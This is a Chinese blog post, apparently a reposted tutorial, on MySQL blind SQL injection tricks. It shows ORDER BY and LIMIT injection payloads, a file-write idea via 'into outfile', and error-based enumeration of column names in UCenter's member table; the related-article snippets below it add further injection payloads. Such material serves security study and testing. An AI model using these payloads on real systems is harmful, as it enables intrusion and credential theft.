盲注 mysql 密码_Mysql盲注技巧

最新推荐文章于 2022-11-07 21:10:43 发布
最新推荐文章于 2022-11-07 21:10:43 发布
阅读量197 收藏
点赞数
文章标签: 盲注 mysql 密码
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_29928877/article/details/113390248
版权

废话少说,直接上代码

一、order by 的参数注入技巧:

两种方法,思路都一样。

example. “select username,password from uc_members order by”.$_GET['oderby']

a.常见的利用方法:

1.[SQL] select username,password from uc_members order by 1,If((select 1)=2,1,(select value from uc_settings));

返回错误:[Err] 1242 - Subquery returns more than 1 row

2.[SQL] select username,password from uc_members order by 1,If((select 1)=1,1,(select value from uc_settings));

返回正常。

b.国外paper看到的方法:

1.[SQL] select username,password from uc_members order by 1,(select case when(2<1) then 1 else 1*(select username from uc_members)end)=1;

返回错误:[Err] 1242 - Subquery returns more than 1 row

2.[SQL] select username,password from uc_members order by 1,(select case when(2>1) then 1 else 1*(select username from uc_members)end)=1;

返回正常。

二、limit 的参数注入技巧:

a.order by之后的limit参数 的注入,因为正常的sql语句order by后无法接union,所以没有好办法,就一个鸡肋思路:into outfile '/www/root/xxx.php';

b.limit前无order by时的注入,那就方便多了,后面可以直接接union select ,随便怎么注都行了:

select * from cdb_members limit 1 union select 1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7

这里还有个技巧,使用procedure analyse可以获取字段名称:

select * from cdb_members where uid=1 limit 1,1 procedure analyse()

不过procedure analyse同样不能使用在order by之后:

[SQL] select * from cdb_members order by uid desc limit 1 procedure analyse()

[Err] 1386 - Can't use ORDER clause with this procedure

三、无法猜测字段时的技巧:

在mysql5以下版本或者information_schema 无法访问的时候,无法猜到某个表的字段名,于是可以采用这个办法,在子查询中使用%0,报错获得列名。以ucenter的uc_members为例。

1.猜测列数:SELECT 1 FROM `uc_members` where (SELECT * FROM `uc_members`)=(1)

返回错误:#1241 - Operand should contain 12 column(s)

2.SELECT 1 FROM `uc_members` where (1,2,3,4,5,6,7,8,9,10,11,12)=(SELECT * FROM `uc_members` union select 1,2,3,4,5,6,7,8,9,10,11,12 limit 1)

返回正常。

3.SELECT 1 FROM `uc_members` where (1,2,3,4,5,6,7,8,9,10,11,12)=(SELECT * FROM `uc_members` union select 1%0,2,3,4,5,6,7,8,9,10,11,12 limit 1)

返回错误:#1048 - Column 'uid' cannot be null

4.SELECT 1 FROM `uc_members` where (1,2,3,4,5,6,7,8,9,10,11,12)=(SELECT * FROM `uc_members` union select 1,2%0,3,4,5,6,7,8,9,10,11,12 limit 1)

返回错误:#1048 - Column 'username' cannot be null

5. ……

注:5.1以上版本不适用,字段必须为非空(not null)

粗细愁倚阑
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
手动SQL注入(盲注)讲解
weixin_42061868的博客
01-20 1023
由于很多人(特别是针对初学者)在百度查找相关的SQL盲注的文章时总感觉无法得到一篇很基础,很完整的文章,所以在这里讲解一篇完整的SQL注入文章 1 查找源码之家等网站进行下载一个网站, 在这里我下载的ASP制作的网站 (1) 打开源码之家的官网:https://www.mycodes.net/ 如下图,都是可以下载的。 ###(2)随便下载一个网站后,解压文件并且复制到自己建立的目录下面,然后...
布尔盲注新姿势
Lemon's blog
02-23 385
前言: 之前的布尔盲注都是在很正常的情况下进行注入,这次做了一道布尔盲注的题目,学到了不少知识,记录一下。 0x00:regexp正则表达式注入 测试发现username=1' or 1=1#时回显密码错误,密码测试绕不过去,使用布尔盲注试试 没有反应,说明应该是substr函数被禁用了,那该怎么进行猜测,之前的方法都是通过这个函数进行截取然后判断,既然给禁用了就说明应该还有其他的函数可以进行...
SQL注入——通过注入得到已知用户名密码
热门推荐
以梦为马,不负韶华
12-08 2万+
· PHP代码如下: <?php //error_reporting(0); $link =mysqli_connect('localhost', 'root', 'root', 'test'); if (!$link) { die('Could not connect to MySQL: ' .mysqli_connect_error()); } $link->se
shop靶机实践sql盲注获取后台管理员账号密码
过客璇璇的博客
03-15 3731
shop靶机盲注获取后台管理员账号密码 找到注入点。 注入点:http://192.168.244.131:60785/shop/productshopxp.asp?id=485 首先分析一下为什么确定这是一个注入点: 一、 正常页面如下: 二、 在URL后加’即http://192.168.244.131:60785/shop/productshopxp.asp?id=485...
sql盲注 各种方法拿到 管理员账户和密码
qq_41860876的博客
11-08 1505
任务092:手动漏洞挖掘-SQL盲注笔记 介绍 web没有编写好显示过滤有数据库返回的报错信息,黑客可以通过报错信息了判断漏洞存在 下面就是没有过滤好发现了他存在sql漏洞 sql盲注就是看不见他报错的信息,报错的信息被过滤了,看不见我们在进行sql注入这个就叫sql盲注了 看一下返回就结果没有显示任何东西 ...
sql注入之盲注相关知识
weixin_50644728的博客
09-23 6295
1.查数据库长度: ?id=1 or length(database())>7 ?id=1 or length(database())>8 ?id=1 or length(database())=8 通过length函数去猜数据库的长度,最后确认数据库长度为八 2.查数据库名 id=1%20or%20substr(database(),1,1) 时间盲注 ...
mysql-blind(高级盲注+基于布尔).docx
最新发布
01-23
总结来说,布尔型盲注是一种在无回显情况下探测和利用SQL注入的技巧,它依赖于页面输出状态的变化。尽管过程可能较为复杂,但通过熟练掌握和实践,可以有效地探测并利用这种类型的注入点。在实际安全审计中,掌握这...
Web应用安全:Mysql盲注.pptx
06-19
Web应用安全领域中,MySQL盲注是一种常见的安全漏洞,它发生在SQL注入攻击中,但攻击者无法直接看到数据库的响应结果。在这种情况下,攻击者必须通过观察页面加载时间、页面内容的变化或者其他间接方式来判断SQL查询...
aleenzz#MYSQL_SQL_BYPASS_WIKI#2-5-我与云锁有个约会1
07-25
以下内容都是把云锁的增强型防护开启简单的布尔盲注生僻函数绕过 这里比较难的点其实也在from,但是比云盾好点,毕竟可以用到注释看到这两条语句其实我们可以清楚的知
Web应用安全:Mysql盲注文本.docx
06-17
MySQL盲注】是Web应用安全领域中一种重要的SQL注入技术。当攻击者无法直接从网页上获取数据库的反馈信息时,他们会通过一系列的探测和判断来获取敏感数据。盲注主要分为三种类型:基于布尔的SQL盲注、基于时间的...
布尔盲注(一)
qq_45300786的博客
07-11 2308
盲注介绍: 注入攻击的本质,是把用户输入的数据当成代码执行。 这里有2个关键条件: 第一个是用户能够控制输入 第二个是原本程序要执行的代码,拼接了用户输入的数据。 盲注所对应的是显错注入,显错注入我们之前讲过,但是很多时候, web服务器关闭了错误回显,这时候就没有办法实行SQL注入了吗? 2.常用函数 length()长度函数 substr()截取字符串 ascii()返回字符的ascii码 sleep()延迟函数 if(expr1,expr2,expr3)判断函数,有点类似于三元运算 3、
sql注入杂谈(三)--盲注
weixin_43570648的博客
03-19 204
再讲文章之前,先说说,文章里面被标红的字段,是加了反引号的,(因为被csdn和谐了)还有*号也被和谐了,我是用的※来代替 前面2章已经讲过了union select 以及报错注入的语法以及简单的绕狗方法,现在我来谈谈我对于盲注的看法,网上把盲注的种类分了几种,我在这里就不分了,我就把我自己目前掌握的方法都记录下来,绕狗的一些心得。顺带一提,其实我的盲注其实是很菜的,但是盲注确是很厉害的,因为能un...
SQL注入2——盲注(重学)
qq_52263650的博客
11-07 3795
SQL注入2——布尔型盲注(重学)
SQL注入篇——盲注
爱国小白帽
01-08 1283
盲注之布尔类型注入 DVWA平台low级别 一、判断数据库名的长度 1’ and (length(database()))>4# 超出长度会报错 二、获取数据库名的字符 判断每个字母在ASCII码中的范围,最终确定是哪个字母 1’ and (ascii(substr(database(),n,1)))>66# 三、获取数据库表名(先获取表名数量,再获取表名长度) 1' and (...
mysql 猜解字段,DVWA全等级SQL Injection(Blind)盲注--手工测试过程解析
weixin_42610671的博客
03-17 683
一、DVWA-SQL Injection(Blind)测试分析SQL盲注 VS 普通SQL注入:普通SQL注入SQL盲注1.执行SQL注入攻击时,服务器会响应来自数据库服务器的错误信息,信息提示SQL语法不正确等2.一般在页面上直接就会显示执行sql语句的结果1.一般情况,执行SQL盲注,服务器不会直接返回具体的数据库错误or语法错误,而是会返回程序开发所设置的特定信息(也有特例,如基于报错的盲注...
Sqli-labs11-15 (附盲注获取数据库长度和名字的脚本)
Recar的博客
12-26 3855
第十一题 报错这里写代码片一个登陆界面这是登陆成功 用户名输入单引号报错猜测是 select * from users where username='$name' and password='$password' 闭合select * from users where username=' 'or 1=1 # ' and password='$password'要将后面的and注释掉 不然
sql盲注流程
qq_40039615的博客
06-11 974
一、判断是否存在sql注入 二、判断字段数 三、利用substr函数与ascii函数 将需要判断的内容进行ascii转码 然后对照ascii表,得到内容信息 解题详细:手工盲注与sqlmap (方法一)手工盲注 1.打开靶场http://xxx:43922/ 点击登录框下面的通知 进入http://xxx:43922/new_list.php?id=1 2.判断此处存在sql注入 构造and 1=1正常 构造and 1=2不正常 3.判断字段数 构造...
2018最新MySQL破解密码的方法
云深海阔专栏
06-19 1万+
一、修改配置文件,在mysqld下添加skip-grant-tables 二、重启MySQL使配置生效 三、免密码登陆 1、登陆试用多种方法修改密码都报错,所以常用破解密码不适用 2、试用新的方法修改密码如下操作(记得刷新) 四、改回my.cnf文件以及重启MySQL服务 至此MySQL密码破解完毕 ...
MySQL布尔型高级盲注实战与技巧解析
MySQL盲注是一种高级的Web应用程序安全漏洞,特别是针对那些错误处理机制良好的目标页面。在这种情况下,常规的SQL注入利用方法,如通过UNION查询获取数据字段,可能因为页面无明显回显而变得困难。盲注分为几种类型...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值